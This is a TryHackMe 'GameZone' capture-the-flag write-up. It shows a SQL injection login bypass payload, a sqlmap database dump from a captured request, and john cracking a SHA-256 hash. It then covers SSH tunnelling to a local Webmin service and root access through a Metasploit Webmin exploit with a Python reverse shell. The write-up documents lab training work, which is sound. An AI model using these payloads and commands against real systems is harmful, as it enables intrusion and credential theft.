Game zone
Overview
GameZone is a Hitman themed TryHackMe room focused on exploiting SQL injection vulnerabilities, cracking password hashes, tunneling services via reverse SSH, and ultimately achieving root through Webmin RCE. Note that all parts except the last of this CTF are guided.
Obtaining Access
We are tasked with gaining access to restricted part of web page.
We have been told that the username and password form uses a SQL query to validate login authenticity.
We have been given the SQL statement that is to be executed as follows.
1
SELECT * FROM users WHERE username = :username AND password := password
We can see that from this statement there is an opportunity for a SQL Authentication Bypass.
We can test this by entering the username as 'OR 1=1; -- and our password as Anything.
We have Successfully gained access. And are now on a page with dir portal.php.
Data Ex-filtration Using Sqlmap
We have been told that using SQL map on the earlier used form is a good idea. Lets try it.
First we capture the request using burp suite and then we can save it as a file to use with sqlmap.
Below is the file and the command i used.
1
root@ip-10-10-175-193:~# sqlmap -r req.txt -p searchitem --dump
And this is the request i fed to it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /portal.php HTTP/1.1
Host: 10.10.154.221
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 14
Origin: http://10.10.154.221
Connection: keep-alive
Referer: http://10.10.154.221/portal.php
Cookie: PHPSESSID=6vdl1er63fsrjtp98vl21cnkm6
Upgrade-Insecure-Requests: 1
Priority: u=0, i
searchitem=sus
After letting sqlmap run for a while it dumped a table to the screen called users with the columns pwd and username with one record present.
There was also one other table named post.
1
2
3
4
5
+------------------------------------------------------------------+----------+
| pwd | username |
+------------------------------------------------------------------+----------+
| ab5db91*************************************************2c3efd14 | agent47 |
+------------------------------------------------------------------+----------+
Cracking the Hashed Password
We are then told that we may be able to use john the ripper to obtain the plain-text of the hash so we first detect the hash type using hashinator.
1
root@ip-10-10-175-193:~# hashinator -t ab5db91*************************************************2c3efd14
Now we know the hash type is sha256 we can feed it into john using the following command.
1
root@ip-10-10-175-193:~# john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha256 passwd.hash
We get an output from this with the corresponding plain-text of vi*********24
We are now told we can ssh into the machine. ssh [email protected]
After doing so we see a flag in the home dir.
1
2
agent47@gamezone:~$ cat user.txt
649ac1****************************ac95c
Exposing Services with Reverse Ssh Tunnels
Reverse SSH Port Forwarding
Reverse SSH port forwarding specifies that a given port on the remote server host is to be forwarded to the given host port on the client side.
-L specifies a tunnel (YOU <- CLIENT) meaning that if a site was blocked at work you could run ssh -L 9000:imgur.com:80 [email protected]. and then visit the blocked site on port 9000.
-R alternatively specifies a remote tunnel (YOU -> CLIENT) You forward you traffic to the server for others to view.
Using Ss to Find Running Services
We first run
1
agent47@gamezone:~$ ss -tulpn
This will give us a list of TCP, UDP, Listening Sockets, As well as the Processes running without resolving the service names.
We can see that 5 services are running.
1
2
3
4
5
6
7
8
9
agent47@gamezone:~$ ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 *:10000 *:*
udp UNCONN 0 0 *:68 *:*
tcp LISTEN 0 128 *:10000 *:*
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 128 :::80 :::*
tcp LISTEN 0 128 :::22 :::*
In the above we can see that there are services running on port 10000 68 and on localhost port 3306 after creating a remote tunnel to each i was then able to see the following.
- Nothing particular on port 3306 just a message about packets out of order.
- Nothing on port 3306.
- A webmin admin login, This is interesting.
Webmin is a web based system administration tool.
I was not able to find the version by looking at page source so i instead ran a nmap scan on localhost targeting the remote tunnel on port 10000.
1
2
3
4
5
6
7
8
9
10
11
root@ip-10-10-175-193:~# nmap localhost -p 10000 -sV -T5
Starting Nmap 7.80 ( https://nmap.org ) at 2025-07-06 19:55 BST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000068s latency).
Other addresses for localhost (not scanned): ::1
PORT STATE SERVICE VERSION
10000/tcp open http MiniServ 1.580 (Webmin httpd)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.73 seconds
As you can see it is running version 1.580.
Privilege Escalation Using Metasploit
This part of the CTF is unguided so i will begin as follows.
First i will use searchsploit to attempt to find exploits for the version of webmin that i am dealing with.
I then found a exploit available in metasploit which i proceeded to use.
In particular i used the unix/webapp/webmin_show_cgi_exec exploit.
And filled in the required options note that RHOST was localhost due to the ssh tunnel we are using.
I chose the python revershell payload.
After running i switched to the created session using session -i 1 then simply catted the root flag.